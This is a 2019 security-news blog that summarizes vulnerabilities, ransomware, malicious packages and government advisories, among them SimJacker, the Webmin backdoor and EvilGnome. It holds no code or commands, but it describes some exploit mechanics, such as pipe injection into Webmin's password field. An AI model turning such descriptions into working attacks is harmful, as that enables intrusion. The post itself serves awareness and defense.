Tuesday, September 17, 2019

#Beware #RedAlert: New SIM Card Flaw Lets Hackers Hijack Any Phone Just By Sending SMS

Cybersecurity researchers today revealed the existence of a new and previously undetected critical vulnerability in SIM cards that could allow remote attackers to compromise targeted mobile phones and spy on victims just by sending an SMS.

Dubbed "SimJacker," the vulnerability resides in a particular piece of software, called the S@T Browser (a dynamic SIM toolkit), embedded on most SIM cards that is widely being used by mobile operators in at least 30 countries and can be exploited regardless of which handsets victims are using.

What's worrisome? A specific private company that works with governments is actively exploiting the SimJacker vulnerability from at least the last two years to conduct targeted surveillance on mobile phone users across several countries.

S@T Browser, short for SIMalliance Toolbox Browser, is an application that comes installed on a variety of SIM cards, including eSIM, as part of SIM Tool Kit (STK) and has been designed to let mobile carriers provide some basic services, subscriptions, and value-added services over-the-air to their customers.

you can read the full  article


LULU ransomware encrypts files on Linux systems

    Linux™ operating systems are sometimes overlooked as targets for malware due to the smaller pool of victims compared to more popular operating systems. With the reduced number of targets, the attacker is incentivized to direct their efforts towards a richer hunting ground. But despite that, the lilu (or lilocked) ransomware targets solely Linux based web servers. It has infected over 6000 servers so far and looks to continue for the foreseeable future.

    While the ransomware primarily targets Linux web servers, there is no evidence precluding the ransomware’s ability to infect other Linux systems. The web server’s infected status is visible to web crawlers whereas non-web server systems would not be as publicly visible. The lilu ransomware encrypts files on the victim’s system and leaves a “#README.lilocked” file in each folder in which encrypted files are located. The “#README.lilocked” file is a ransom note that directs the victim to a Tor page with a key to use on said Tor page. The key provides access to a second ransom note that directs the victim to purchase Bitcoin or Electrum to pay a ransom to decrypt the files.

    The ransom has been so far inconsistent and has reportedly requested from .01BTC to .03BTC. So far the ransomware has only encrypted non-essential files and has left the servers running. It targets a few kinds of file extensions such as HTML, SHTML, JS, CSS, PHP, INI, and other image file formats. 

   There has not been any success in the decryption efforts. But one victim, going by Jay Gairson on Twitter, claims that the ransomware uses an Exim exploit and that the ransomware persists despite the system being taken offline and replaced. Exim is an open-source mail transfer agent for Unix-like operating systems. The exploit that is suspected is tracked in CVE-2019-15846 and has since been patched and leads researchers to believe lilu only affects older versions of Exim. There has yet to be any evidence of paying the ransom being a successful method to decrypt one’s files as well, though the attacker is not incentivized to create a reputation of services not rendered.


 • https://www.bleepingcomputer.com/news/security/lilocked-ransomwareactively-targeting-servers-and-web-sites/ 



Does Anyone Else Know Where Your Children Are

    Keeping track of your child’s whereabouts has never been easier. A quick search on Amazon shows thousands of entries for low-cost GPS trackers designed to be worn by children and linked to an app on the parent’s smartphone. However, the appeal of the low cost comes at a much larger price. Researchers from Avast found a handful of vulnerabilities in 29 models of GPS trackers made by Chinese company Shenzhen i365. The researchers found that an attacker with an internet connection can use the GPS to track the location of the wearer, spoof the location data of the device, and even access the microphone of the device to eavesdrop on the wearer. This is because the communication between the device, the cloud, and the companion mobile app use the unencrypted HTTP protocol. This allows for the exploitation of a man in the middle (MitM) attack where an attacker can listen in on the communication and alter the data being sent or received.

    In addition to this, the user account, which is associated with an ID number, comes shipped with a default password of 123456. The researchers found that the ID number is not assigned randomly, it is associated with the device’s IMEI number. An IMEI number is a 15-digit identifier given to mobile and satellite phones. With this knowledge, the researchers could log into the accounts of about 25% of the devices in the sequence of IMEI numbers. This would allow them to see the real-time location of the devices on that account.  Avast estimated that over half-a-million people are using GPS trackers affected by these vulnerabilities.

    Despite the manufacturer’s location in China, the researchers found that the GPS trackers were also widely used in the United States and elsewhere around the world. Avast attempted to privately contact the manufacturer about these vulnerabilities but have not received a response. A senior researcher stated that "we have done our due diligence in disclosing these vulnerabilities to the manufacturer, but since we have not heard back after the standard window of time, we are now issuing this public service announcement to consumers and strongly advise you to discontinue use of these devices." When shopping for any IoT devices, it can be tempting to go with the low-cost, off-brand option, especially when that name-brand device can be so much more expensive. However, the cheaper option is often skimped on or has simply not included basic security measures to reduce the cost. The researchers advised consumers to do their research and buy from respected vendors. These devices are designed to provide peace of mind but in reality, they make the wearer more vulnerable, not less.


 • https://thehackernews.com/2019/09/gps-tracking-device-for-kids.html 


Wednesday, September 4, 2019

Intentional Backdoor Webmin RCE Vulnerability

    When Turkish researcher Özkan Mustafa Akkuş publicly disclosed a Remote Code Execution (RCE) vulnerability in the Webmin application at DefCon this month, the Webmin developers went into emergency overdrive mode to fix this issue ASAP. While the ethics of Akkuş’ disclosure without notifying the Webmin team first are certainly questionable, the vulnerability itself is severe and had been hidden for over a year. Even more alarming, further investigation by the Webmin team revealed that it wasn’t a coding error but in fact a malicious backdoor injected into the codebase through a build server.

    Webmin is a popular open-source application allowing management of Unixbased systems over the web. This includes management of users and groups, databases, web servers, e-mail, firewall, backups: pretty much any administration of the system. The vulnerability, CVE-2019-15107, pertains to the password expiration function allowing admins to require a user to set a new password at a set interval. By adding a pipe command “|” to the old password field using POST requests, a remote attacker could run arbitrary commands as the root user on the system.

   The vulnerability was introduced into the system by a malicious attacker in April 2018 by exploiting a Webmin development build server and modifying the password_change.cgi script. After some users reported that the password expiration feature was encountering errors, the developers reverted to an older version of the file that turned this feature off by default and inadvertently corrected the vulnerability. However, the attacker once again modified the file in July 2018. Even though the build server was decommissioned in September 2018, the new server was built from a directory containing the modified file so the vulnerability persisted until its DefCon reveal.

    The Webmin development team stated that version 1.890 included the vulnerability and that the password expiration function is enabled by default, making this the most vulnerable version. Versions 1.900 through 1.920 also include the vulnerability but with the password expiration function disabled by default. Version 1.930 was released following the DefCon reveal, which contains fixes for this vulnerability as well as some Cross-Site Scripting (XSS) vulnerabilities. Webmin developers are taking steps to ensure this issue doesn’t happen again, including an updated build process to only use checked-in code from GitHub, rotating all passwords and keys, and an audit of all GitHub check-ins over the past year.


•  https://thehackernews.com/2019/08/webmin-vulnerability-hacking.html

 • https://www.zdnet.com/article/backdoor-found-in-webmin-a-popular-web-based-utility-for-managing-unix-servers/ 


The Syrk ransomware

    The Syrk ransomware, first reported by researchers at Cyren Security, disguises itself as a cheating device for the multiplayer Hunger Games style video game Fortnite. It proclaims the ability to provide aim assistance as well as player location revealing abilities. It doesn't provide any of these capabilities and instead installs an open source ransomware, Hidden-Cry with a .syrk extension.
    Hidden-Cry was shared on git-hub at the end of last year and is still openly available. The ransomware goes through a ten step process which consists of contacting a command & control (CC) server, disabling common defenses, executing a payload, encrypting files with a .Syrk extension, establishing persistence, preventing termination, periodically deleting files to establish a threat, and finally propagating itself malicious versions of files within connected USB drives. This particular malware is relatively benign. The decrypting tool is readily available with the files downloaded and is easily extracted and used to decrypt the ransomed files. The malware also creates .txt files to be sent to the CC server so that the attacker may provide a password to the victim once the ransom is paid. It's possible for a criminal to simply not send anything once payment is rendered. But if they intend to propagate via USB drive, it's likely that the first victim would be in contact with the next, and creating a reputation where payment brings no benefit would only prevent further payment. What's surprising is that the ransomware creates the file with the password right on the victim's computer. It even includes a Delete.exe that removes all traces of itself from the victim's computer (not USB drives) and even removes the start up file, making good on its promise after the password is entered.

    This attack is clearly targeted towards either the weak willed or the less informed. Children are particularly susceptible to the temptation to even the playing field to match the older or more dexterous peers in the game. The disguise as a tool for cheating already shows that the attacker intends to target those who would try to use shortcuts to achieve success over the effort of getting better at the game. While desire to win doesn’t make a vulnerable target, the lack of experience with scams and pressure to perform despite the limitations of age combine to make a particularly vulnerable demographic. The malware itself may not be as dangerous or complex as others, but it's target is particularly susceptible to such machinations.





Potential Hurricane Dorian Cyber Scams

Original release date: September 4, 2019

The Cybersecurity and Infrastructure Security Agency (CISA) warns users to remain vigilant for malicious cyber activity targeting Hurricane Dorian disaster victims and potential donors. Fraudulent emails commonly appear after major natural disasters and often contain links or attachments that direct users to malicious websites. Users should exercise caution in handling any email with a hurricane-related subject line, attachment, or hyperlink. In addition, users should be wary of social media pleas, texts, or door-to-door solicitations relating to severe weather events.

To avoid becoming victims of malicious activity, users and administrators should review the following resources and take preventative measures:

If you believe you have been a victim of cybercrime, file a complaint with the Federal Bureau of Investigation Internet Crime Complaint Center at www.ic3.gov.

Monday, August 26, 2019

SQLite Heavy Vulnerabilities

Researchers at CheckPoint unveiled a method that could allow malicious actors to exploit programs that query SQLite databases. The findings were presented at the DEFCON cybersecurity conference last weekend by Omer Gull, a vulnerability researcher at CheckPoint. The researchers found that by overwriting a non-malicious SQLite database with a specially crafted malicious one, they can achieve remote code execution. SQLite is a C-language library that enables a fully self-contained SQL database engine. SQLite is used extensively by multiple operating systems such as iOS and Android, and applications such as Chrome, Firefox, Safari, and Dropbox. The researchers state that this attack technique allows for the exploitation of code that queries an SQLite database that an attacker can modify.

The researchers stated that the idea of an SQLite attack came from its role in command-and-control (C2) servers utilized by password-stealing malware. While reverse-engineering the malware, the researchers determined that most of them work in the same way. They state that “after the malware collects these SQLite files, it sends them to its C2 server where they are parsed using PHP and stored in a collective database containing all of the stolen credentials”. Using the specially crafted SQLite database, the researchers were able to gain a web shell on a C2 server in a lab environment by simulating the upload of a database.

In addition to exploiting a C2 server, the researchers provided another scenario where this vulnerability can be exploited. Within the iOS operating system, the “AddressBook.sqlitedb” file is one of the most common database files. This file is used for contact storage and is often referenced by either Apple apps or third-party messaging apps. By replacing this file with a malicious version, the researchers say that they can gain code execution. Normally persistence on iOS devices is difficult to achieve due to Apple’s Secure Boot feature. This security feature mandates that all executable files must be signed. However, SQLite database files are not signed, which allow for their modification.
While the researchers privately disclosed the vulnerabilities (CVE-2019-8600, CVE2019-8598, CVE-2019-8602, CVE-20198577) that were then patched in the latest SQLite version along with the latest iOS version (iOS 12.3), they said there are numerous other scenarios where this vulnerability can be exploited. “SQLite is one of the most deployed software in the world. However, from a security perspective, it has only been examined through the lens of WebSQL and browser exploitation,” said Omer Gull. SQLite attack scenarios should be considered a “major cyberthreat.” As always, keeping programs and operating systems up to date with the latest patches is one of the best ways to prevent the exploitation of these vulnerabilities.




VxWorks operating system Critical Vulnerabilities Found in Millions of Devices

    The Armis research team recently revealed 11 vulnerabilities, ranging from denial of service to remote code execution, affecting the VxWorks operating system. VxWorks is a real time operating system used in millions of embedded devices, from consumer electronics to medical devices. The vulnerabilities discovered bypass most forms of security and can even be used on the devices designed to secure the infrastructure if they utilize VxWorks.
The most critical vulnerabilities found allow for remote code execution on the target devices. Five of the critical vulnerabilities found require no interaction on the target system and are exploitable no matter how the device is configured. The sixth vulnerability requires the VxWorks internal DHCP client to parse a specially crafted response from an IP address allocation request. While this may seem like a difficult attack scenario, DHCP requires no authentication during these requests. This means an attacker can just wait, listening on the network until a request is made, and then spoof a malicious response before the real server. These vulnerabilities could allow for full takeover of a target network that used VxWorks based firewalls, making them especially dangerous.
Besides the critical vulnerabilities, there were also five lower impact, but still impactful, vulnerabilities found. One of the vulnerabilities allows for a complete denial of service which can be triggered by an attacker outside of the network. The other denial of service vulnerabilities discovered require the attacker to be in network proximity of the vulnerable device but can still prevent the vulnerable device from functioning if triggered.

    Armis describes three attack scenarios in their release document. The first scenario is based on the attacker being outside of the target network. VxWorks is used in a number of firewall devices and are immediately able to be exploited because they handle all network traffic. The second attack scenario is similar to the first in that the attack is outside of the network but are able to attack devices inside the network that can be reached from the outside. The third attack scenario is by an attacker positioned inside the network, such as on wifi or a guest network.

   VxWorks is sold and supported by Wind River, who was notified about the vulnerabilities. Wind River posted a security advisory covering the vulnerabilities and updates for affected customers. It is critical that affected devices are patched as soon as updates for them are available to prevent exploitation of these flaws.


IRS Warns of New Email Scam

The Internal Revenue Service (IRS) has issued a warning about a new email scam in which malicious cyber actors send unsolicited emails to taxpayers from fake (i.e., spoofed) IRS email addresses. The emails contain a link to a spoofed IRS.gov website that displays fake details about the targeted recipient’s tax refund, return, or account. The emails instruct the recipient to access their refund information by entering a provided password on the spoofed website. By entering the password, the victim unintentionally downloads malware that could enable the malicious cyber actors to take control of the affected system or obtain sensitive information.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the IRS news release and the CISA Tip on Avoiding Social Engineering and Phishing Attacks for more information.

Rubys in the Rough

    The Ruby programming language is a high level general-purpose programming language that was developed to focus on being Object oriented when the options for it were few and the creator found them lacking. The language uses a package manager called RubyGems to have a standardized platform for managing programs and libraries. 

    Thousands of users are potentially affected by vulnerabilities in 18 versions of Ruby libraries. The vulnerabilities included code that launched crypto miners inside other Ruby Projects. Other features of the compromised libraries included collection and delivery of data including credentials, payment, service provider, and the entire database to a server in the Ukraine. The backdoor contained a way for an attacker to send cookies through this vulnerability and to remotely execute code and commands. The code was inserted into several different crypto-mining libraries as well as a few utilities like omniauth_amazon and cron_parser. These are all relatively small packages, but the malicious actor tried to push his updates onto rest-client which is a much more widely used and scrutinized project, the backdoor was identified within hours and other projects where it was inserted were also discovered.
    Because of the quick identification time, there were only around a thousand downloads of the latest update for this older version of rest-client. However, the smaller libraries had this attack in place for over a month. Thankfully, the total downloads for all of those libraries combined numbered less than 3000. We last saw such dependency attacks in the strong_password library which downloaded a payload from pastebin.com instead of holding malicious code itself. 
    Of crowd sourced and open sourced projects, one must take extra precautions and evaluate the diffs between updates properly before committing to using such a solution. Without due diligence, one could find themselves unknowingly inserting bad code into their projects or relying on bad dependencies that could compromise both developer data, and user data in their products and projects. Relying on the descriptions and faith that a thoroughly used gem is a disservice to you as well as a disservice to the community at large.



Mistake Apple accidentally Un-Patches Old Flaw

    Apple accidentally re-introduced a previously patched vulnerability from iOS 12.3 into iOS 12.4. This led to the release of a jailbreak for iOS 12.4 from Security Researcher Pwn20wnd called “unc0ver 3.5.0.” This is the first jailbreak to be released for up-to-date iPhones in years. This is significant, because, according to an article from Motherboard, iPhone bugs are so valuable that they are often not reported to Apple at all, and jailbreak exploits are often sold for large amounts of money. For example, the FBI paid over $1.2 million for a vulnerability that allowed them to gain access to an iPhone 5c used by San Bernardino shooter Syed Farook. 

    Another reason security researchers might be unwilling to report bugs to Apple is that Apple doesn’t offer a strong enough incentive. After refusing to offer a bug bounty program for some time, Apple announced its bug bounty program in 2016. Rewards range from $25,000 for “Access from a sandboxed process to user data outside of that sandbox process” to $200,000 for “Secure boot firmware components.” While this may sound like a lot of money, it is nothing compared to what Companies like Zerodium and Exodus offer for similar exploits. Zerodium has offered up to $1.5 million for exploits that would allow jailbreaks, and Exodus has offered up to $500,000 for similar exploits. Alternatively, some researchers don’t report bugs to Apple because the patching of those bugs would interfere with their ability to do further research. According to Luca Todesco, a well-known figure in the iPhone jailbreak community, “Either you report and kill your own bugs, or you decide not to report the bug so that you don’t complicate your own life and you can keep doing research.”

    The vulnerability used in this jailbreak was discovered by New Williamson, who works for Google Project Zero. The bug, titled CVE-2019-8605, could allow a malicious application to “execute arbitrary code with system privileges.” According to The Hacker News, “besides embedding the exploit into an innocentlooking app, the vulnerability can also be exploited remotely by combining it with sandbox bypass flaws in Apple Safari web browser or other Internet exposed services.” Even with this vulnerability, remotely hacking an iPhone is still a difficult task. However, it is substantially less difficult while this bug still exists on iPhones. 




Tuesday, August 6, 2019

This is a Great Article by the Knowbe4 Company

Knowbe4 is a great solution for companies to train user on Social Engineering issues.
Here a great example of the content that they deliver to their base.

Scam of the Week: Equifax Settlement Phishing

Well, that did not take long! The Equifax Data Breach resulted in a settlement and those affected have a choice between free credit monitoring or a $125 payment. Internet lowlifes are now targeting victims of the Equifax data breach with phishing attacks and are spoofing Equifax’s settlement page.

Your users should report these as malicious emails. If they fall for it and click on the link, they are likely winding up on a spoofed site that looks very similar to the existing Equifax settlement page.

There, they are going to be exposed to a social engineering scam, trying to steal as much data as possible.

I suggest you send the following to your employees, friends and family. You're welcome to copy/paste/edit:


ALERT: Internet bad guys are now trying to trick you into filing an Equifax claim and get a $125 payment because your personal data was in the Equifax data breach. They are sending phishing attacks that look like they come from Equifax and when you click on the links, you wind up on a fake website that looks like it's Equifax, but will try to steal your personal information. Don't fall for it.

if you want to file a claim, go the legit FTC website and click on the blue "File a Claim" button. The website will check your eligibility for that claim, not everyone's information was compromised.

Go to their blog at https://blog.knowbe4.com/ and also explore the free tools on their site https://www.knowbe4.com/free-it-security-tools

More examples of Speed to market not Secure First

    New technology often saturates a market before fully ripening to prime usefulness. The race to be first to market is often seen in the idea of recognized household names like Alexa, Blackberry, or even the Oculus Rift. While they might not always be the best at what they do, the familiarity can smooth over many of the kinks in the products they produce.

     The Hickory Smart Bluetooth Enabled Deadbolt allows its user to manage their home security remotely and to have the assurance that the door is locked in case they are concerned that they forgot to do so when they left the house. While this function seems to be useful to a potential customer, they have had 6 vulnerabilities uncovered by Rapid7 security researchers. One of the most concerning vulnerabilities is cleartext credential transmission from the Hickory Smart Ethernet Bridge device; it's something I would expect even the least security minded designer to avoid.

    The rest of the data is encrypted and it would be difficult to translate the credentials into actionable information regarding the deadbolt, but if the user were to change the credentials from the defaults and an adversary were able to obtain said credentials, they could be included in future credential stuffing attacks affecting the user. The Amcrest IP2M-841B IP camera is a rebranded Dahua camera; Dahua has had a history of security issues. It has a bug that exposes allows anyone to connect to the camera over http and decode the audio output for their listening pleasure.

    The camera wraps transmissions in a DHAV container, but it is trivial to decipher and play in a VLC player. In their haste to provide a product, they seem to be keeping these products at different patch levels, exposing users to security issues that may have been already patched. As Amcrest is one of many companies to sell rebranded Dahua products, it is unknown how many products are vulnerable to this bug.

    While the focus on being first to market with a technology may establish a foothold in the homes of consumers, it also makes the customers they seek to serve vulnerable to any cyber security risks that may have been left on the cutting room floor in the rush to get the product out the door. Testing and security is becoming ever more challenging by the day and each year we find our old standards insufficient. The effort to obtain access to an unlocked door or bugged camera might not be cost efficient to do for the average person at scale, but it easily puts higher value targets at risk, and simply not being a target is no excuse to support these practices.


El Paso and Dayton Tragedy-Related Scams and Malware Campaigns

In the wake of the recent shootings in El Paso, TX, and Dayton, OH, the Cybersecurity and Infrastructure Security Agency (CISA) advises users to watch out for possible malicious cyber activity seeking to capitalize on these tragic events. Users should exercise caution in handling emails related to the shootings, even if they appear to originate from trusted sources. Fraudulent emails often contain links or attachments that direct users to phishing or malware-infected websites. Emails requesting donations from duplicitous charitable organizations are also common after tragic events. Be wary of fraudulent social media pleas, calls, texts, donation websites, and door-to-door solicitations relating to these events.

To avoid becoming a victim of malicious activity, users and administrators should consider taking the following preventive measures:

Friday, August 2, 2019

NIST Publishes Multifactor Authentication Practice Guide

The National Institute of Standards and Technology (NIST) National Cybersecurity Center of Excellence (NCCoE) has published NIST Cybersecurity Practice Guide: Multifactor Authentication for E-Commerce. The guide provides e-commerce organizations multifactor authentication (MFA) protection methods they can implement to reduce fraudulent purchases.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages e-commerce organizations to download the guide to learn how to prevent e-commerce fraud using MFA solutions.

Cylance Antivirus Vulnerability

Original release date: August 2, 2019

The CERT Coordination Center (CERT/CC) has released information on a vulnerability affecting Cylance Antivirus products. A remote attacker could exploit this vulnerability to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review CERT/CC Vulnerability Note VU#489481 and the Cylance Resolution for BlackBerry Cylance Bypass webpage for patch information and additional recommended workarounds.

Tuesday, July 30, 2019

Steps to Safeguard Against Ransomware Attacks

Original release date: July 30, 2019

The Cybersecurity and Infrastructure Security Agency (CISA), Multi-State Information Sharing & Analysis Center (MS-ISAC), National Governors Association (NGA), and the National Association of State Chief Information Officers (NASCIO) have released a Joint Ransomware Statement with recommendations for state and local governments to build resilience against ransomware:

  1. Back up systems—now (and daily). Immediately and regularly back up all critical agency and system configuration information on a separate device and store the backups offline, verifying their integrity and restoration process. If recovering after an attack, restore a stronger system than the one lost, fully patched and updated to the latest version.
  2. Reinforce basic cybersecurity awareness and education. Ransomware attacks often require the human element to succeed. Refresh employee training on recognizing cyber threats, phishing, and suspicious links—the most common vectors for ransomware attacks. Remind employees of how to report incidents to appropriate IT staff in a timely manner, which should include out-of-band communication paths.
  3. Revisit and refine cyber incident response plans. Have a clear plan to address attacks when they occur, including when internal capabilities are overwhelmed. Make sure response plans include how to request assistance from external cyber first responders, such as state agencies, CISA, and MS-ISAC, in the event of an attack.

CISA encourages organizations to review the Joint Ransomware Statement and the following ransomware guidance:

Friday, July 19, 2019

Spearphone a attack for Andriod Phones

    A team of cybersecurity researchers - Abhishek Anand, Chen Wang, JIan Liu, Nitesh Saxena, and Yingying Chen - have discovered and demonstrated a new side -channel attack that could potentially allow apps to listen in on the voice coming through an Android phone’s loudspeakers without requiring any device permissions.

    This new attack has been named Spearphone.  It works by taking advantage of the accelerometer built into most Android phones. An accelerometer is a sensor that can detect and monitor the movement of a phone, like being shaken, tilted, or lifted up. The accelerometer can be accessed by any app with any permissions.

    According to The Hacker News, “Since the built-in loudspeaker of a smartphone is placed on the same surface as the embedded motion sensors, it produces surface-borne and aerial speech reverberations in the body of the smartphone when loudspeaker mode is enabled.” The nature of sound is vibrations that travel through a medium transferring energy to our ear drums which then translate the mechanical vibrations into electric signals which our brains translate into sounds. This attack bypasses the need for a second microphone replacing the audio receiver with the accelerometer in the phone itself to translate the soundwaves into electrical messages.

    The researchers created and Android application that was designed to record speech reverberations using the accelerometer and send the captured data back to an attacker-controller server as a proof-of-concept. The researchers have shown that this attack can successfully be used to spy on phone calls, listen to voice notes or multimedia, and to spy on the use of an assistant such as Google Assistant or Bixby, as shown below.

    The research team believes the Spearphone attack is dangerous and has “significant value as it can be created by low-profile attackers.” The attack can also be used in gender classification with over 90% accuracy and speaker identification with over 80% accuracy. 
read the full article here

Linux users be aware

    In the world of malware, almost all malicious software is based around Windows desktop or Linux server systems. Part of this is due to the widespread use of these systems as well as the architecture of the Linux core operating system. This makes it even more surprising when researchers from Intezer recently discovered a desktop Linux spyware application dubbed EvilGnome that no security or antivirus scanners detect yet.

    EvilGnome is a collection of modules designed to spy on a user’s system and exfiltrate data to an external Command & Control (C2) server controlled by the attacker. It is designed to appear as an extension of the Gnome GUI environment for Linux desktop.

    The malware is a self-extracting archive shell script that installs the modules and sets up persistence through use of the crontab. The modules are: • ShooterSound—records audio clips from the user’s microphone using PulseAudio. • ShooterImage—captures screenshots of the user’s desktop. • ShooterFile—scans the filesystem and is capable of filtering files by type and creation date. • ShooterPing—data exfiltration module, also capable of receiving new commands from the C2 server and stopping other modules from running. • ShooterKey—possible keylogger module that appears to be unfinished.

    Many of the modules appear to be very limited or missing some functionality. Also, metadata about the malware’s creation was included in the upload to VirusTotal, leading the researchers to believe this was a prototype version of the malware that was mistakenly released.

    Intezer researchers believe the malware to be tied to the Russian-affiliated group Gamaredon. Not only does EvilGnome use the same hosting provider as Gamaredon for C2 servers and similar domain names such as .space and .ddns, it was also found on an IP address controlled by Gamaredon 2 months ago and uses techniques and modules similar to Gamaredon’s collection of Windows tools. 
To check if a Linux system is infected, look for an executable called gnome-shell -ext in the ~/.cache/gnome-software/gnome-shell-extensions  directory.





Thursday, July 18, 2019

A Methodology for Enabling Forensic Analysis Using Hypervisor Vulnerabilities Data: NIST Publishes NISTIR 8221

Hardware/Server Virtualization is a foundational technology in a cloud computing environment and the hypervisor is the key software in that virtualized infrastructure. However, hypervisors are large pieces of software with several thousand lines of code and are therefore known to have vulnerabilities. Hence, a capability to perform forensic analysis to detect, reconstruct and prevent attacks based on vulnerabilities on an ongoing basis is a critical requirement in cloud environments.

To gain a better understanding of recent hypervisor vulnerabilities and attack trends, identify forensic information needed to reveal the presence of such attacks, and develop guidance on taking proactive steps to detect and prevent those attacks, NIST has published NIST Internal Report (NISTIR) 8221, “A Methodology for Enabling Forensic Analysis Using Hypervisor Vulnerabilities Data.” NISTIR 8221 outlines a methodology to enable this forensic analysis, and illustrates the methodology using two open-source hypervisors—Xen and Kernel-based Virtual Machine (KVM). The source for vulnerability data is NIST’s National Vulnerability Database (NVD).

Publication details:

CSRC Update:

Draft NIST Cybersecurity White Paper on Understanding Emerging Blockchain Identity Management Systems

NIST announces the release of a Draft Cybersecurity White Paper, A Taxonomic Approach to Understanding Emerging Blockchain Identity Management Systems (IDMS), which provides an overview of the standards, building blocks, and system architectures that support emerging blockchain-based identity management systems and selective disclosure mechanisms. The document also considers the full spectrum of top-down versus bottom-up governance models for both identifier and credential management and addresses some of the risks and security concerns that may arise. The terminology, concepts, and properties introduced in this work can facilitate communications amongst business owners, software developers, cybersecurity professionals within an organization, and individuals who are or will be using such systems.

A public comment period for this document is open until August 9, 2019. See the publication details link for a copy of the document and instructions for submitting comments.

Publication details:

CSRC update:

Saturday, July 13, 2019

NCSC Releases Advisory on Ongoing DNS Hijacking Campaign


Original release date: July 12, 2019

The United Kingdom’s National Cyber Security Centre (NCSC) has released an advisory about an ongoing Domain Name System (DNS) hijacking campaign. The advisory details risks and mitigations for organizations to defend against this campaign, in which attackers use compromised credentials to modify the location to which an organization’s domain name resources resolve to redirect users, obtain sensitive information, and cause man-in-the-middle attacks.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages administrators to review the NCSC Advisory, apply the recommended mitigations, and refer to CISA’s Alert AA19-024A – DNS Infrastructure Hijacking Campaign for more information.

Wednesday, July 10, 2019

Draft NIST Cybersecurity White Paper on Understanding Emerging Blockchain Identity Management Systems

    NIST announces the release of a Draft Cybersecurity White Paper, A Taxonomic Approach to Understanding Emerging Blockchain Identity Management Systems (IDMS), which provides an overview of the standards, building blocks, and system architectures that support emerging blockchain-based identity management systems and selective disclosure mechanisms. The document also considers the full spectrum of top-down versus bottom-up governance models for both identifier and credential management and addresses some of the risks and security concerns that may arise. The terminology, concepts, and properties introduced in this work can facilitate communications amongst business owners, software developers, cybersecurity professionals within an organization, and individuals who are or will be using such systems.

    A public comment period for this document is open until August 9, 2019. See the publication details link for a copy of the document and instructions for submitting comments.

Publication details:

CSRC update:


Saturday, July 6, 2019

First-ever malware strain spotted abusing new DoH (DNS over HTTPS)

Godlua, a Linux DDoS bot, is the first-ever malware strain seen using DoH to hide its DNS traffic.
Go Here to read about this from Catalin Cimpanu @ ZDnet.
    The U.S. Food and Drug Administration released a warning last week recalling certain Medtronic MiniMed insulin pumps over concerns that the device may be vulnerable to cyber attacks. The warning comes after researchers found that an attacker with adjacent access was able to wirelessly communicate with the device and alter the pump settings, either providing or restricting insulin to a patient. These insulin pumps are meant to communicate wirelessly with other medical devices such as blood glucose meters, glucose sensor transmitters, and CareLink USB devices. The models specifically impacted are the Medtronic MiniMed insulin pumps, the MiniMed 508 insulin pump, and the MiniMed Paradigm series which are collectively used by approximately 4,000 patients in the U.S., according to Medtronic. 

    This vulnerability is described by CVE2019-10964 and has been assigned a score of 7.1 out of 10, designating it as a high severity vulnerability. The core of the vulnerability revolves around improper access control when associating with other devices. The researchers state that the wireless RF communication protocol doesn’t properly implement authentication or authorization, two important factors that mediate network access. In computer security, authentication refers to the mechanism by which a device is proven to be a legitimate user and authorization refers to the resources that the device has access to. The researchers found that an attacker with sufficient access can inject, replay, alter, or interpret data from the vulnerable insulin pumps. Medtronic is urging patients affected by this vulnerability to talk to their healthcare provider about exchanging their insulin pump for a newer model with appropriate security measures.

    While this exploit has not been seen in the real world and there are no known reports of patient harm resulting from it, there are precautions that users of wirelessly connected medical equipment can take to protect themselves. Ensuring that no one tampers with the medical device or other devices connected to it, refrain from sharing the serial number, noticing any alarms or alerts made by the device, and immediately canceling any unintended actions that are made by the medical device are all good steps to take. While it is always important for companies to implement proper security protocols in their devices, it’s even more important when there is the potential for serious harm to an end user, such as in the medical field. As more of these important systems become connected, the need for good security implementation becomes more and more important.




SmaLock Vulnerabilities

    Smart locks have been increasing in popularity for the last few years. They provide a number of conveniences that make them an enticing option for people looking to replace their current locks. Things like automatically unlocking as you approach with your hands full or allowing a friend to unlock the door only when you’re on vacation sound great at first. But the risks of poorly secured and designed smart locks may outweigh those conveniences.

    Pen Test Partners along with 2 additional researchers, @evstykas and @cybergibbons, recently took a look at the U-tec Ultraloq and found a number of critical vulnerabilities that would allow an unauthorized person to bypass the lock. The first vulnerability they found was that their application API leaks data about the users of the locks, including the physical location of where the lock is. The second vulnerability found in their API is much more interesting though. By simply changing the user ID value during the login process you can impersonate any other user and have full control of their locks. Pairing these 2 vulnerabilities together means you would first be able to find installations of these locks and then unlock them when you get there.

    The researchers also spent some time looking at the Bluetooth based proximity unlocking feature. Due to a poor encryption implementation in the app and lock they were able to develop a brute force attack capable of unlocking the lock. This attack would allow someone to open an Ultraloq without requiring knowledge of who the lock belongs to like in the first attack. These 2 attacks alone allow complete bypass of the smart lock, but what if the attacker isn’t very technical? No problem, the lock is also easily picked. By inserting a thin pick into the body of the lock an attacker is able to shim the mechanism and open the lock with ease. The fallback physical lock mechanism was also easily picked by the researchers using only basic lockpicking techniques.

    The Ultraloq isn’t the only smart lock smart lock to have showstopping vulnerabilities and probably won’t be the last. Smart home products, especially security related ones have been a popular target for researchers since they first hit the market. If you’re considering a smart lock it is important to research the specific model being considered and stick to trusted manufacturers. Even still there is no guarantee that the lock won’t have a vulnerability found at some point so it is also important to apply firmware updates when they become available from the manufacturer. Ultraloq released a fix for their API last week but have not provided an update for the Bluetooth vulnerability yet.




Sunday, June 30, 2019

Sometimes free is the juicy apple with a parasite waiting to land.

    When something is free, chances are pretty high that "the user" is the product. Services that are free usually generate value for the creator or provider by sharing exposure with advertisers or perhaps using the data collected from the "free" product for other means such as market studies or product testing before a final product. But sometimes free is the juicy apple with a parasite waiting to land its hook inside the consumer's gut.

    Researchers from ESET and Malwarebytes labs have found cryptominers within high end music production software products provided for free to download and use. Named LoudMinerby ESET and simultaneously named Bird Miner by MalwareBytes Labs, the cryptominer hides by bundling itself inside already large files. The pirated versions of Virtual Studio Technology programs seem to function normally except that they are slower due to increased processor load. This obfuscation not only hides the existence of the additional malicious installation software, but also focuses their targets on users with high processing power: users who need to process visual and audio media. These two operate themselves within a lightweight virtual machine(VM) in the background. This keeps it hidden from the user, but also generalizes itself for both Mac, Windows, and Linux users, lowering the skill threshold of the developer.

